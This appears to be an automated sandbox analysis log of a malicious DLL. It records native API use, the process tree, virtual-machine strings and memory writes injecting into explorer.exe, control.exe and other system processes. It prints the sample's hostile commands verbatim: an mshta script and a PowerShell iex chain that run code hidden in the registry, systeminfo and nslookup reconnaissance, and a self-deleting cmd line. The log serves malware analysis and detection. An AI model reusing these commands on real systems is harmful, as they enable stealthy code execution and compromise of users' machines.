Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062736BB NtGetContextThread,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0627D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0627B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062764C4 memset,NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06285220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0628EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_06283829 NtQuerySystemInformation,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062710C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
Source: C:\Windows\System32\control.exe | Code function: 24_2_0053583C NtCreateSection, |
Source: C:\Windows\System32\control.exe | Code function: 24_2_005240C0 NtReadVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 24_2_0054A148 NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 24_2_0052B11C RtlAllocateHeap,NtQueryInformationProcess, |
Source: C:\Windows\System32\control.exe | Code function: 24_2_005341D8 NtMapViewOfSection, |
Source: C:\Windows\System32\control.exe | Code function: 24_2_0052AA6C NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, |
Source: C:\Windows\System32\control.exe | Code function: 24_2_005404CC NtAllocateVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 24_2_00526D24 NtWriteVirtualMemory, |
Source: C:\Windows\System32\control.exe | Code function: 24_2_005265E4 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 24_2_00529660 NtSetContextThread,NtUnmapViewOfSection,NtClose, |
Source: C:\Windows\System32\control.exe | Code function: 24_2_0055F002 NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572395A148 NtQueryInformationProcess, |
Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_00000157239365E4 NtQueryInformationToken,NtQueryInformationToken,NtClose, |
Source: C:\Windows\System32\rundll32.exe | Code function: 37_2_000001572396F002 NtProtectVirtualMemory,NtProtectVirtualMemory, |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll" |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1 |
|
Source: unknown |
Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> |
|
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP" |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP" |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
|
Source: C:\Windows\System32\control.exe |
Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1" |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\control.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\rundll32.exe |
Process information set: NOOPENFILEERRORBOX |
Source: explorer.exe, 0000001B.00000000.408453384.00000000051AC000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000 |
Source: explorer.exe, 0000001B.00000000.411018486.00000000051F7000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER |
Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: VMware SATA CD00 |
Source: control.exe, 00000018.00000002.474123133.000001D83E5E6000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_ |
Source: RuntimeBroker.exe, 00000031.00000000.538603337.0000018280A54000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b} |
Source: 2E09.bin.27.dr |
Binary or memory string: gencounter Microsoft Hyper-V Gene Kernel |
Source: 2E09.bin.27.dr |
Binary or memory string: vmgid Microsoft Hyper-V Gues Kernel |
Source: 2E09.bin.27.dr |
Binary or memory string: bttflt Microsoft Hyper-V VHDP Kernel |
Source: explorer.exe, 0000001B.00000000.411018486.00000000051F7000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000 |
Source: 2E09.bin.27.dr |
Binary or memory string: vpci Microsoft Hyper-V Virt Kernel |
Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday |
Source: 2E09.bin.27.dr |
Binary or memory string: storflt Microsoft Hyper-V Stor Kernel |
Source: mshta.exe, 00000013.00000002.342969322.00000162CE011000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ |
Source: 2E09.bin1.48.dr, 2E09.bin.27.dr |
Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No |
Source: control.exe, 00000018.00000002.474123133.000001D83E5E6000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} |
Source: RuntimeBroker.exe, 0000002D.00000000.507758371.000001FFC2056000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d |
Source: explorer.exe, 0000001B.00000000.410736983.0000000005138000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000 |
Source: explorer.exe, 0000001B.00000000.443315532.0000000006005000.00000004.00000001.00020000.00000000.sdmp |
Binary or memory string: VMware SATA CD00dRom0cY |
Source: C:\Windows\SysWOW64\rundll32.exe |
Memory written: C:\Windows\System32\control.exe base: 7FF6A5E812E0 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Memory written: C:\Windows\System32\control.exe base: 5D0000 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Memory written: C:\Windows\System32\control.exe base: 7FF6A5E812E0 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Memory written: C:\Windows\explorer.exe base: 360000 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Memory written: C:\Windows\explorer.exe base: 7FF802BC1580 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Memory written: C:\Windows\explorer.exe base: 2760000 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Memory written: C:\Windows\explorer.exe base: 7FF802BC1580 |
Source: C:\Windows\System32\control.exe |
Memory written: C:\Windows\explorer.exe base: 35E000 |
Source: C:\Windows\System32\control.exe |
Memory written: C:\Windows\explorer.exe base: 7FF802BC1580 |
Source: C:\Windows\System32\control.exe |
Memory written: C:\Windows\explorer.exe base: 2740000 |
Source: C:\Windows\System32\control.exe |
Memory written: C:\Windows\explorer.exe base: 7FF802BC1580 |
Source: C:\Windows\System32\control.exe |
Memory written: C:\Windows\System32\rundll32.exe base: 7FF67F255FD0 |
Source: C:\Windows\System32\control.exe |
Memory written: C:\Windows\System32\rundll32.exe base: 15723670000 |
Source: C:\Windows\System32\control.exe |
Memory written: C:\Windows\System32\rundll32.exe base: 7FF67F255FD0 |
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8B62287000 |
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 |
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F9BB760000 |
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 |
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 418792000 |
Source: C:\Windows\explorer.exe |
Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FF802BC1580 |
Source: C:\Windows\explorer.exe |
